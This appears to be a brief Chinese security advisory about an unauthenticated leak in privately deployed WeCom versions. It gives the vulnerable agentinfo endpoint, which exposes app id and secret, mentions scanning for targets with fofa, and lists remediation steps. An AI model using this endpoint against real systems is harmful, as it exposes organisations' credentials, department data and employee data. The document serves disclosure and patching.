目录
影响版本
影响私有化部署:
toB toG版微信 2.5.x 版本
2.6.930000 版本以下
危险程度:高危。攻击者可以进行获取企业的部门信息,员工信息,如权限较高包括应用获取,记录文件等等均可查看。
复现过程
fofa收集信息:
利用:http://mydomain/cgi-bin/gateway/agentinfo,可以直接未授权获取到id和secret。
企业微信开发者文档:
可拼接获取企业微信接口IP:https://qyapi.weixin.qq.com/cgi-bin/get_api_domain_ip?access_token=ACCESS_TOKEN
修复方式
1. 联系企业微信官方获取补丁修复
2. 限制 /cgi-bin/gateway/agentinfo 接口访问
3. 修改返回值信息,对文件加黑名单限制